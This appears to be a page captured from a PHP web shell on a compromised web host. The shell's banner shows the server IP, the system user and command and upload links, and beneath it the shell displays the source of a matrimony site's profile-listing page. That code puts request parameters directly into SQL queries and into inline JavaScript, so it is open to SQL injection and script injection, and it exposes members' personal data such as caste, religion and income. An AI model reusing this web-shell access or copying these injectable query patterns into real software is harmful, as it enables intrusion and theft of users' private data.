Server IP : 103.53.40.154 / Your IP : 3.141.12.30 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/vivahmilankendra.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php require_once("includes/dbsmain.inc.php");?> <?php include("site-main-query.php"); /*if(empty($_SESSION['userLoginId'])){ header("location:index.html"); exit; }*/ ?> <!doctype html> <html> <head> <meta charset="utf-8"> <meta name="robots" content="index, follow" /> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"> <title> No 1 Matrimony Portal in India - Profile Llisting</title> <meta name="keywords" content="sweetheartmetrimony.Com No 1 Matrimony Portal in India - Profile Llisting" /> <meta name="description" content="sweetheartmetrimony.Com No 1 Matrimony Portal in India - Profile Llisting" /> <!-- Stylesheets --> <link href="<?=SITE_WS_PATH?>/css/bootstrap.min.css" rel="stylesheet"> <link href="<?=SITE_WS_PATH?>/css/style.css" rel="stylesheet"> <link href="<?=SITE_WS_PATH?>/css/style1.css" rel="stylesheet"> <!---------> <link href="<?=SITE_WS_PATH?>/css/other-profile-style.css" rel="stylesheet"> <link href="<?=SITE_WS_PATH?>/css/responsive.css" rel="stylesheet"> <link href="<?=SITE_WS_PATH?>/css/style-res-nav.css" rel="stylesheet"> <link href="<?=SITE_WS_PATH?>/css/style-client.css" rel="stylesheet" > <link href="<?=SITE_WS_PATH?>/css/jPushMenu.css" rel="stylesheet"> <link href="<?=SITE_WS_PATH?>/css/jquery.fancybox.css" rel="stylesheet"> <!----------------> <link rel="stylesheet" href="<?=SITE_WS_PATH?>/css/style-customizer-rgt.css"/> <!---social-----> <link rel="stylesheet" href="<?=SITE_WS_PATH?>/css/style-social-1.css"> <link rel="stylesheet" href="<?=SITE_WS_PATH?>/css/font-awesome/css/font-awesome.min.css"> <link href="<?=SITE_WS_PATH?>/css/collapsible1.css" rel="stylesheet" type="text/css"> <link rel="stylesheet" href="<?=SITE_WS_PATH?>/css/styd1.css"> <style> .brd-rg{border-right:dotted 1px #efefef;} .mp03 {} .pl-btn-gry a{display:block; background-color:#f1f1f2; color:#000; font-size:14px; padding:0px 2px; border:solid 1px #eaeaeb; text-align:center; transition:all 1.5s; width:99%; transition:all 1.5s;} /************ .molcht{color:#fff; transition:all 1.5s; padding:2px 6px; background-color:#056cbc; transition:all 1.5s; border:solid 1px #056cbc;} .molcht:hover{color:#056cbc; transition:all 1.5s; border:solid 1px #056cbc; background-color:#fff; transition:all 1.5s;} ************************/ .frmst0d p { position: relative; top: 5px !important; font-size: 14px; line-height: 15px; padding: 4px 0 4px 0!important; } .mpp-rfol-sty{height:200px; width: 100%; border:solid 1px #ccc; vertical-align: middle; display: table-cell; background-color: #efefef; padding:5px !important; margin-bottom:5px !important;} .txt-rg{text-align: right;} .onlsty-prls{font-size:12px; margin:0px; padding:4px;} .mpp-rfol-sty img{height:auto; width:auto;} .bg-pro1{height: 360px; overflow: auto;} .pd01 {padding-top: 10px;height: 60px;} @media (min-width:320px) and (max-width:767px) {.pd01 {height: auto;} .main-header .header-lower { padding-bottom: 10px;} .mp1pr{padding:0px;} .mp03 { margin-right:0px !important; } .bg-pro1{height:auto;} .brd-rg{border-right:dotted 0px #efefef;} .mpp-rfol-sty {/***height:150px;***/height: 100%;} .txt-rg{text-align: left;} #req_load_area115{margin: 0px; padding:5px; position: relative; left: -5px;} .mp-btm1 { padding-top:0px !important; } .main-header .header-lower .logo { text-align:center !important; } } </style> </head> <body> <?php include("popup-register-form.php"); ?> <div style="position:absolute; z-index:-0; width:100%;"> <div class="page-wrapper" > <!--<div class="preloader"></div>--> <?php if($_SESSION['userLoginId']==""){ include("site-header.php"); }else{ include("site-header-login.php"); } ?> <section class="bg-sec-sty"> <div class="container" <?php if($_SESSION['userLoginId']==""){?> onClick="open_register_model()" <?php }?> > <div class="row"> <div class="col-lg-3 col-md-3 col-sm-12 col-xs-12 mp_pro mp1pr"> <?php include("member-filters-left.php");?> </div> <!---------> <div class="col-lg-9 col-md-9 col-sm-12 col-xs-12 mp_pro"> <?php $cond1 = ""; $cond2 = ""; $cond3 = ""; $cond4 = ""; $cond5 = ""; $gender = ""; $mainCond = ""; if (!empty($search_for)) { if ($search_for == "Bride") { $gender = "Female"; } if ($search_for == "Groom") { $gender = "Male"; } $cond1 = "reg_gender='$gender'"; } else { $userGender = db_scalar("SELECT reg_gender FROM tbl_registration WHERE reg_id='$_SESSION[userLoginId]'"); if ($userGender == "Female") { $gender = "Male"; } if ($userGender == "Male") { $gender = "Female"; } $cond1 = "reg_gender='$gender' AND"; } if ($gender == "") { $cond1 = ""; } if (!empty($search_age_from) && !empty($search_age_to)) { $cond2 = "reg_age BETWEEN $search_age_from AND $search_age_to"; } if (!empty($search_marital_status)) { $cond3 = "AND reg_marital_status='$search_marital_status'"; } if (!empty($search_religion)) { $cond4 = "AND reg_religion ='$search_religion'"; } if (!empty($search_state)) { $cond5 = "AND reg_state_name ='$search_state'"; } if ($cond1 != "") { $mainCond = "AND $cond1 AND ($cond2 $cond3 $cond4 $cond5)"; } if (!empty($filter)) { if ($filter == "All") { $sql = "SELECT * FROM tbl_registration WHERE $cond1 reg_status='Active'"; } else if (!empty($filter) && $filter_type == "age") { $sql = "SELECT * FROM tbl_registration WHERE $cond1 reg_status='Active' AND reg_age BETWEEN '$filter' AND '$_REQUEST[filter2]'"; } else if (!empty($filter) && $filter_type == "height") { $sql = "SELECT * FROM tbl_registration WHERE $cond1 reg_status='Active' AND reg_height BETWEEN '$filter' AND '$_REQUEST[filter2]'"; } else if (!empty($filter) && $filter_type == "marital" && $filter != "Does not Matter") { $sql = "SELECT * FROM tbl_registration WHERE $cond1 reg_status='Active' AND reg_marital_status='$filter'"; } else if (!empty($filter) && $filter_type == "income") { $sql = "SELECT * FROM tbl_registration WHERE $cond1 reg_status='Active' AND reg_annual_income LIKE '%$filter%'"; } else if (!empty($filter) && $filter_type == "toung") { $sql = "SELECT * FROM tbl_registration WHERE $cond1 reg_status='Active' AND reg_mother_tongue='$filter'"; } else if (!empty($filter) && $filter_type == "state") { $sql = "SELECT * FROM tbl_registration WHERE $cond1 reg_status='Active' AND reg_state_name='$filter'"; } else if (!empty($filter) && $filter_type == "city") { $sql = "SELECT * FROM tbl_registration WHERE $cond1 reg_status='Active' AND reg_city='$filter'"; } else if (!empty($filter) && $filter_type == "profession") { $sql = "SELECT * FROM tbl_registration WHERE $cond1 reg_status='Active' AND reg_occupation='$filter'"; } else if (!empty($filter) && $filter_type == "country") { $sql = "SELECT * FROM tbl_registration WHERE $cond1 reg_status='Active' AND reg_country_name='$filter'"; } else if (!empty($filter) && $filter_type == "profile-by") { $sql = "SELECT * FROM tbl_registration WHERE $cond1 reg_status='Active' AND reg_profile_manage_by='$filter'"; } else if (!empty($filter) && $filter_type == "religion") { $sql = "SELECT * FROM tbl_registration WHERE $cond1 reg_status='Active' AND reg_religion='$filter'"; } else if (!empty($filter) && $filter_type == "cast") { $sql = "SELECT * FROM tbl_registration WHERE $cond1 reg_status='Active' AND (reg_cast='$filter' || reg_sub_cast='$filter')"; } else if (!empty($filter) && $filter_type == "edu") { $sql = "SELECT * FROM tbl_registration WHERE $cond1 reg_status='Active' AND reg_highest_edu='$filter'"; } else if (!empty($filter) && $filter_type == "cnty") { $sql = "SELECT * FROM tbl_registration WHERE $cond1 reg_status='Active' AND reg_country_name='$filter'"; } else if (!empty($filter) && $filter_type == "state") { $sql = "SELECT * FROM tbl_registration WHERE $cond1 reg_status='Active' AND reg_state_name='$filter'"; } else if (!empty($filter) && $filter_type == "drink" && $filter != "Does not Matter") { $sql = "SELECT * FROM tbl_registration WHERE $cond1 reg_status='Active' AND reg_drinking_habits='$filter'"; } else if (!empty($filter) && $filter_type == "smoke") { $sql = "SELECT * FROM tbl_registration WHERE $cond1 reg_status='Active' AND reg_smoking_habits='$filter'"; } else if (!empty($filter) && $filter_type == "eating") { $sql = "SELECT * FROM tbl_registration WHERE $cond1 reg_status='Active' AND reg_eating_habits='$filter'"; } else if (!empty($filter) && $filter_type == "manage-by") { $sql = "SELECT * FROM tbl_registration WHERE $cond1 reg_status='Active' AND reg_profile_manage_by='$filter'"; } else if (!empty($filter) && $filter_type == "gender") { $sql = "SELECT * FROM tbl_registration WHERE reg_status='Active' AND reg_gender='$filter'"; } } else { $sql = "SELECT * FROM tbl_registration WHERE reg_status='Active' $mainCond"; } $dataMember = db_query($sql); $countMember = mysqli_num_rows($dataMember); if ($countMember) { while ($recMember = mysqli_fetch_array($dataMember)) { ?> <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12 bg-pro1"> <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12 bg-lstd1" style="margin:0px; padding:0px;"> <div class="col-lg-8 col-md-8 col-sm-12 col-xs-12 " style="margin:0px; padding:0px;"> <?php if($_SESSION['userLoginId']!=""){?> <a href="other-profile.php?mem=<?=$recMember['reg_id']?>" target="_blank"><h4> <span class="pcid">AMRGD<?=$recMember['reg_id']?> | Profile Created for <?=$recMember['reg_for']?></span></h4></a> <?php }else{ ?> <a href="Javascript:void(0)" class="molcht" ><h4><span class="pcid"> <?="AM".substr(strtoupper($recMember['reg_name']),0,2)?><span class="custom-star">****</span> | Profile Created for <?=$recMember['reg_for']?></span></h4></a> <?php } ?> </div> <div class="col-lg-4 col-md-4 col-sm-12 col-xs-12 txt-rg"> <a <?php if($_SESSION['userLoginId']!=""){?> href="other-profile.php?mem=<?=$recMember['reg_id']?>" <?php }else{?> class="molcht" <?php }?> target="_blank"><h4><i class="fa fa-mobile"></i> +91-xxxxxxxxxx</h4></a> </div> </div> <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12 " style="padding:10px 0px 0px 0px; background-color:#fff; margin:0px;"> <div class="col-lg-3 col-md-3 col-sm-12 col-xs-12 mp-btm1 text-center"> <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12 mpp-rfol-sty text-center"> <?php $check_photo=$recMember['reg_profile_photo']; if(empty($check_photo) && $recMember['reg_gender']=="Female"){?> <img src="<?=SITE_WS_PATH?>/images/1.ico"> <?php }else if(empty($check_photo) && $recMember['reg_gender']=="Male"){?> <img src="<?=SITE_WS_PATH?>/images/2.png"> <?php }else{?> <img src="<?=SITE_WS_PATH?>/upload_images/<?=$recMember['reg_profile_photo']?>"> <?php }?> </div> <p class="onlsty-prls">Last Login On <?=date("d-M-y",strtotime($recMember['reg_last_login']))?></p> <!-- <p style="margin:0px; padding:0px;"><a href="#" class="molcht"><i class="fa fa-commenting-o" aria-hidden="true"></i> Member Online</a></p>--> </div> <div class="col-lg-9 col-md-9 col-sm-12 col-xs-12 mp-btm1"> <div class="col-lg-6 col-md-6 col-sm-12 col-xs-12 mp-btm1 brd-rg"> <div class="col-lg-4 col-md-4 col-sm-5 col-xs-5 prf-dtl">Age</div> <div class="col-lg-2 col-md-2 col-sm-2 col-xs-2">:</div> <div class="col-lg-6 col-md-6 col-sm-5 col-xs-5 prf-dtl2"><?=$recMember['reg_age']?>yrs</div> <div class="clearfix"></div> <div class="col-lg-4 col-md-4 col-sm-5 col-xs-5 prf-dtl">Height</div> <div class="col-lg-2 col-md-2 col-sm-2 col-xs-2">:</div> <div class="col-lg-6 col-md-6 col-sm-5 col-xs-5 prf-dtl2"><?=$recMember['reg_height']?></div> <div class="clearfix"></div> <div class="col-lg-4 col-md-4 col-sm-5 col-xs-5 prf-dtl">Religion</div> <div class="col-lg-2 col-md-2 col-sm-2 col-xs-2">:</div> <div class="col-lg-6 col-md-6 col-sm-5 col-xs-5 prf-dtl2"><?=$recMember['reg_religion']?></div> <div class="clearfix"></div> <div class="col-lg-4 col-md-4 col-sm-5 col-xs-5 prf-dtl">Caste</div> <div class="col-lg-2 col-md-2 col-sm-2 col-xs-2">:</div> <div class="col-lg-6 col-md-6 col-sm-5 col-xs-5 prf-dtl2"><?=$recMember['reg_cast']?></div> <div class="clearfix"></div> <div class="col-lg-4 col-md-4 col-sm-5 col-xs-5 prf-dtl">Location</div> <div class="col-lg-2 col-md-2 col-sm-2 col-xs-2">:</div> <div class="col-lg-6 col-md-6 col-sm-5 col-xs-5 prf-dtl2"><?=$recMember['reg_state_name']?>, <?=$recMember['reg_country_name']?></div> <div class="clearfix"></div> <div class="col-lg-4 col-md-4 col-sm-5 col-xs-5 prf-dtl">Education</div> <div class="col-lg-2 col-md-2 col-sm-2 col-xs-2">:</div> <div class="col-lg-6 col-md-6 col-sm-5 col-xs-5 prf-dtl2"><?=$recMember['reg_highest_edu']?></div> <div class="clearfix"></div> <div class="col-lg-4 col-md-4 col-sm-5 col-xs-5 prf-dtl">Profession</div> <div class="col-lg-2 col-md-2 col-sm-2 col-xs-2">:</div> <div class="col-lg-6 col-md-6 col-sm-5 col-xs-5 prf-dtl2"><?=$recMember['reg_occupation']?></div> <div class="clearfix"></div> <div class="col-lg-4 col-md-4 col-sm-5 col-xs-5 prf-dtl">Annual Income</div> <div class="col-lg-2 col-md-2 col-sm-2 col-xs-2">:</div> <div class="col-lg-6 col-md-6 col-sm-5 col-xs-5 prf-dtl2"><?=$recMember['reg_member_annual_income']?></div> </div> <div class="col-lg-6 col-md-6 col-sm-12 col-xs-12" style="margin-top:10px;"> <div class="clearfix"></div> <div class="col-lg-6 col-md-6 col-sm-6 col-xs-6 pl-btn-gry"> <a <?php if(!empty($_SESSION['userLoginId'])){?> href="other-profile.php?mem=<?=$recMember['reg_id']?>" <?php }else{?>class="molcht"<?php }?> ><i class="fa fa-envelope"></i> Send Mail</a></div> <div class="col-lg-6 col-md-6 col-sm-6 col-xs-6 pl-btn-gry" style="margin-right:0px;"> <a <?php if(!empty($_SESSION['userLoginId'])){?> href="other-profile.php?mem=<?=$recMember['reg_id']?>" <?php }else{?>class="molcht"<?php }?> target="_blank"><i class="fa fa-volume-control-phone"></i> View Contact</a></div> <div class="col-lg-6 col-md-6 col-sm-6 col-xs-6 pl-btn-gry"> <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12 no-padd" id="short_req_load_area<?=$recMember['reg_id']?>" > <?php $sql="SELECT sl_id FROM tbl_shortlist WHERE sl_mem='$recMember[reg_id]' AND sl_by='$userDATA[reg_id]'"; $checkShort=db_scalar($sql); if($checkShort!=""){ ?> <a href="Javascript:void(0)" <?php if(!empty($_SESSION['userLoginId'])){?> onClick="alert('Request is already sent.')" <?php }else{?>class="molcht"<?php }?> ><i class="fa fa-check" aria-hidden="true"></i> Shorted</a> <?php }else{?> <a href="Javascript:void(0)" <?php if(!empty($_SESSION['userLoginId'])){?> onClick="short_request('<?=$recMember['reg_id']?>')" <?php }else{?>class="molcht"<?php }?> ><i class="fa fa-star" aria-hidden="true"></i> Short List</a> <?php }?> </div> </div> <div class="col-lg-6 col-md-6 col-sm-6 col-xs-6 pl-btn-gry" style="margin-right:0px;"> <a target="_blank" <?php if(!empty($_SESSION['userLoginId'])){?> href="other-profile.php?mem=<?=$recMember['reg_id']?>" <?php }else{?> class="molcht" <?php }?> ><i class="fa fa-eye-slash" aria-hidden="true"></i> View Full Profile</a></div> <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12 pl-btn-gry" style="width:100%;"> <a <?php if(!empty($_SESSION['userLoginId'])){?> href="other-profile.php?mem=<?=$recMember['reg_id']?>" <?php }else{?>class="molcht" <?php }?>><i class="fa fa-commenting-o" aria-hidden="true"></i> Member Online Chat Now</a> </div> <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12" id="req_load_area<?=$recMember['reg_id']?>" > <?php $sql="SELECT * FROM tbl_msg_box WHERE (msg_to_mem_id='$recMember[reg_id]' AND msg_from_mem_id='$userDATA[reg_id]')"; $checkReq=db_query($sql); $recReq=mysqli_fetch_array($checkReq); $countReq=mysqli_num_rows($checkReq); $currStatus=""; if($countReq>0){ $currStatus=$recReq['msg_status']; }else{ ////// CROSS CHECK /////// $sql="SELECT * FROM tbl_msg_box WHERE (msg_from_mem_id='$recMember[reg_id]' AND msg_to_mem_id='$userDATA[reg_id]')"; $checkReq2=db_query($sql); $recReq2=mysqli_fetch_array($checkReq2); $countReq2=mysqli_num_rows($checkReq2); if($countReq2>0){ $currStatus=$recReq2['msg_status']; }else{ $currStatus="None"; } } //echo $currStatus; if($currStatus!="None" && $currStatus=='Pending' || $currStatus=='PendingAgain'){ $cond=db_scalar("SELECT COUNT(*) FROM tbl_msg_box WHERE (msg_from_mem_id='$recMember[reg_id]' AND msg_to_mem_id='$userDATA[reg_id]')"); if($cond!=0){ $msg_id_query=db_scalar("SELECT msg_id FROM tbl_msg_box WHERE (msg_from_mem_id='$recMember[reg_id]' AND msg_to_mem_id='$userDATA[reg_id]')"); ?> <a class="btn no-radius mb5 f14" style="width: 100%;" id="acpt_btn" href="Javascript:void(0)" onClick="change_status('<?=$msg_id_query?>','Accepted','<?=$recMember['reg_name']?>')"><i class="fa fa-check" id="acpt_icon" aria-hidden="true"></i> Accept</a> <a class="btn no-radius mb5 f14" style="width: 100%;" id="dcln" href="Javascript:void(0)" onClick="change_status('<?=$msg_id_query?>','Declined','<?=$recMember['reg_name']?>')"><i class="fa fa-times-circle" id="dcln_icon" aria-hidden="true"></i> Decline</a> <?php }else{ ?> <br> <a class="btn no-radius mb5 f14" id="req_btn" href="Javascript:void(0)" onClick="alert('Request is already sent.')" ><i class="fa fa-spinner" id="req_icon" aria-hidden="true"></i> Request In Process</a> <?php } ?> <?php }else if($currStatus!="None" && $currStatus=='Accepted'){?> <br> <h4 style="font-weight:bold; text-align: center; padding: 5px; border-radius: 5px; color:#4ba379; background-color: rgba(187,187,187,0.5);"><i class="fa fa-link" style="color:#7ba76d;"></i> Connected Profile</h4> <?php }else if($currStatus=='Declined'){ $cond_decline=db_scalar("SELECT COUNT(*) FROM tbl_msg_box WHERE (msg_from_mem_id='$recMember[reg_id]' AND msg_to_mem_id='$userDATA[reg_id]')"); if($cond_decline!=0){ ?> <a href="Javascript:void(0)" style="width: 100%;" onClick="alert('Request is declined by you')" class="btn no-radius mb5 f14" id="dcln"><i class="fa fa-check-circle" id="dcln_icon" aria-hidden="true"></i> Declined</a> <?php }else{ ?> <a href="Javascript:void(0)" style="width: 100%;" onClick="alert('Request is declined by receiver')" class="btn no-radius mb5 f14" id="dcln"><i class="fa fa-check-circle" id="dcln_icon" aria-hidden="true"></i> Declined</a> <?php }}else if($currStatus=='Cancelled'){ $cond_cancel=db_scalar("SELECT COUNT(*) FROM tbl_msg_box WHERE (msg_from_mem_id='$recMember[reg_id]' AND msg_to_mem_id='$userDATA[reg_id]')"); if($cond_cancel!=0){?> <a href="Javascript:void(0)" style="width: 100%;" <?php if(!empty($_SESSION['userLoginId'])){?> onClick="send_request('<?=$recMember['reg_id']?>')" <?php }?> id="sndAgain_btn" class="btn no-radius ml5 mb5 f14"><i class="fa fa-paper-plane-o" id="sndAgain_icon" aria-hidden="true"> </i>Send Invitation</a> <?php }else{ ?> <a href="Javascript:void(0)" id="dcln" style="width: 100%;" onClick="alert('Request is already cancelled by you.')" class="btn no-radius ml5 mb5 f14"><i class="fa fa-exclamation-triangle" id="dcln_icon" aria-hidden="true"></i> Cancelled</a> <a href="send-search.php?send=<?=$recMember['reg_id']?>&user=<?=$userDATA['reg_id']?>" style="width: 100%;" class="btn no-radius ml5 mb5 f14" id="sndAgain_btn"><i class="fa fa-paper-plane-o" id="sndAgain_icon" aria-hidden="true"> </i>Send Again</a> <?php }}else{?> <a href="Javascript:void(0)" style="width: 100%;" <?php if(!empty($_SESSION['userLoginId'])){?> onClick="send_request('<?=$recMember['reg_id']?>')" <?php }?> id="sndAgain_btn" class="btn no-radius ml5 mb5 f14"><i class="fa fa-paper-plane-o" id="sndAgain_icon" aria-hidden="true"> </i>Send Invitation</a> <?php } ?> </div> <p class="text-success bold text-center" style="display:none" id="msg<?=$recMember['reg_id']?>"><i class="fa fa-check font-black"></i> Request has been sent successfully.</p> <p class="text-success bold text-center" style="display:none" id="msg_short<?=$recMember['reg_id']?>"><i class="fa fa-check font-black"></i> Request has been sent successfully.</p> </div> </div> <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12" style="border:dashed thin #efefef; margin-top:10px; box-shadow: 4px 4px 4px #efefef;"></div> <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12 mp-btm1"> <p class="pd01"> <img src="images/quotation.png" style="width:30px;"> <?php $short_desc=(strlen($recMember['reg_mem_myself'])>250) ?substr($recMember['reg_mem_myself'],0,250)."...":substr($recMember['reg_mem_myself'],0,250); ?> <?=$short_desc?> <a <?php if(!empty($_SESSION['userLoginId'])){?> class="prof-mr" href="other-profile.php?mem=<?=$recMember['reg_id']?>" <?php }else{?>class="prof-mr molcht" <?php }?> target="_blank">Read More →</a></p> </div> </div> <div class="clearfix"></div> </div> <?php } }else{?> <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12 text-center text-danger pt-20 pb-20">No record(s) found.</div> <?php }?> <div class="clearfix"></div> <!--------> </div> <div class="clearfix"></div> <!------visible--> </div> </div> </section> <?php include("site-footer.php"); ?> <script src="<?=SITE_WS_PATH?>/js/jquery-latest.js"></script> <script> function send_request(memID){ /*$(document).ready(function(e) {*/ /*alert(memID)*/ $.ajax({ url: "member-request.php?MemID="+memID, type: "POST", contentType: false, processData:false, success: function(data){ if(data!=0){ $("#req_load_area"+memID).html(data); $("#msg"+memID).show("slow") $("#msg"+memID).html("<i class='fa fa-check font-black'></i> Your request is sent successfully") setInterval(function(){$("#msg"+memID).fadeOut("slow")},3000); }else{ alert('Unable to sent request now, try again later.'); } }, error: function(){} }); /*});*/ } </script> <script> function short_request(memID){ /*$(document).ready(function(e) {*/ /*alert(memID)*/ $.ajax({ url: "short-request.php?MemID="+memID, type: "POST", contentType: false, processData:false, success: function(data){ if(data!=0){ $("#short_req_load_area"+memID).html(data); $("#msg_short"+memID).show("slow") $("#msg_short"+memID).html("<i class='fa fa-check font-black'></i> Your selection short listed successfully") setInterval(function(){$("#msg_short"+memID).fadeOut("slow")},3000); }else{ alert('Unable to sent request now, try again later.'); } }, error: function(){} }); /*});*/ } </script> <!-- change status --> <script> function change_status(msgID,act,mem){ /*$(document).ready(function(e) {*/ $.ajax({ url: "member-change-status.php?msgID="+msgID+"&act="+act, type: "POST", contentType: false, processData:false, success: function(data){ if(data!=0){ if(act=="Pending-Delete"){ $("#pending-load-area").html(data); document.getElementById('action-msg').innerHTML='Selected request is deleted.'; } if(act=="Cancelled"){ $("#pending-load-area").html(data); document.getElementById('action-msg').innerHTML='Selected request is cancelled'; } if(act=="Received-Delete"){ $("#received-load-area").html(data); document.getElementById('action-msg').innerHTML='Selected request is deleted'; } if(act=="Accepted"){ //$("#received-load-area").html(data); if(data!=""){ document.getElementById('action-msg').innerHTML='Selected request is accepted'; setTimeout(function(){ window.location.href="profile-listing.php?filter=<?=$_REQUEST['filter']?>&filter2=<?=$_REQUEST['filter2']?>&filter_type=<?=$_REQUEST['filter_type']?>"; },1000); } } if(act=="Declined"){ //$("#received-load-area").html(data); if(data!=""){ document.getElementById('action-msg').innerHTML='Selected request is declined'; setTimeout(function(){ window.location.href="profile-listing.php?filter=<?=$_REQUEST['filter']?>&filter2=<?=$_REQUEST['filter2']?>&filter_type=<?=$_REQUEST['filter_type']?>"; },1000); } } document.getElementById('for-update-popup').click(); setTimeout(function() { document.getElementById('close-popup').click();}, 1000); }else{ alert('Unable to sent request now, try again later.'); } }, error: function(){} }); /*});*/ } </script> <script> $(document).ready(function (e) { $("#btnForgetPass").on('click',(function(e) { var loginCre=$("#login_credential").val(); e.preventDefault(); $.ajax({ url:"send-password-reset-link.php?loginCre="+loginCre, type: "GET", contentType: false, processData:false, success: function(data){ if(data==1){ $("#pass-sent").show("fast") setTimeout(function(){ $("#pass-sent").hide("fast") },3000); } }, error: function() { } }); })); }); </script> <script> $(document).ready(function (e) { $("form#frm-popup").on('submit',(function(eve) { eve.preventDefault(); $.ajax({ url: "popup-register.php", type: "POST", data: new FormData(this), contentType: false, processData:false, success: function(data){ //alert(data) if(data>0){ window.location="<?=SITE_WS_PATH?>/register.php"; }else if(data=="no"){ alert("This email id is already exist."); } }, error: function() { } }); })); }); </script> <script src="<?=SITE_WS_PATH?>/js/bootstrap.min.js"></script> <script src="<?=SITE_WS_PATH?>/js/script.js"></script> <script src="<?=SITE_WS_PATH?>/js/menuzord.js"></script> <script src="<?=SITE_WS_PATH?>/js/jPushMenu.js"></script> <script src="<?=SITE_WS_PATH?>/js/owl.js"></script> <!-- validate --> <script src="<?=SITE_WS_PATH?>/js/customcollection.js"></script> <script src="<?=SITE_WS_PATH?>/js/custom1.js"></script> <!--------------> <script src="http://code.jquery.com/jquery-1.12.3.min.js"></script> <script src="<?=SITE_WS_PATH?>/js/jquery.collapsible-normal.js"></script> <script src="<?=SITE_WS_PATH?>/js/jquery-min-form.js"></script> <script src="<?=SITE_WS_PATH?>/js/style-customizer-form.js"></script> <script src="<?=SITE_WS_PATH?>/js/index.js"></script> <script> $('#collapse-menu').collapsible({ contentOpen:["0","1", "2", "3", "4", "5", "6", "7", "8", "9",, "10", "11",, "12"] }); </script> <!--------------show & hidden------------> <script> function showHide(shID,hdID,hdIDD){ if(document.getElementById(shID).style.display=="none"){ $("#"+shID).show(1200); $("#"+hdID).hide('fast'); $("#"+hdIDD).show('fast'); }else{ $("#"+shID).hide(1200); $("#"+hdID).show('fast'); $("#"+hdIDD).hide('fast'); } } </script> <script> var slider = document.getElementById("myRange"); var output = document.getElementById("demo"); output.innerHTML = slider.value; slider.oninput = function() { output.innerHTML = this.value; } </script> <!---------> <!----------change-pws----> <script> // Get the modal //var modal = document.getElementById('myModal'); // //// Get the image and insert it inside the modal - use its "alt" text as a caption //var img = document.getElementById('myImg'); //var modalImg = document.getElementById("img01"); //var captionText = document.getElementById("caption"); //img.onclick = function(){ // // modal.style.display = "block"; // // modalImg.src = this.src; // // captionText.innerHTML = this.alt; //} //// TO OPEN POPUP ///////// var modal = document.getElementById('myModal'); function open_register_model(){ modal.style.display = "block"; } //// TO CLOSE POPUP ///////// var span = document.getElementById("close_register_popup"); span.onclick = function() { modal.style.display = "none"; } </script> <a data-toggle="modal" data-target="#update-popup" id="for-update-popup"></a> <div class="modal fade" id="update-popup" tabindex="-1" role="dialog" aria-hidden="true"> <div class="modal-dialog"> <div class="modal-content" id="update-popup-box"> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><i class="fa fa-times-circle" aria-hidden="true" id="close-popup"></i> </button> <div class="modal-header" style="border-bottom:none"> <h4 class="modal-title text-center"> <span id="action-msg"></span>.</h4> </div> </div> </div> </div>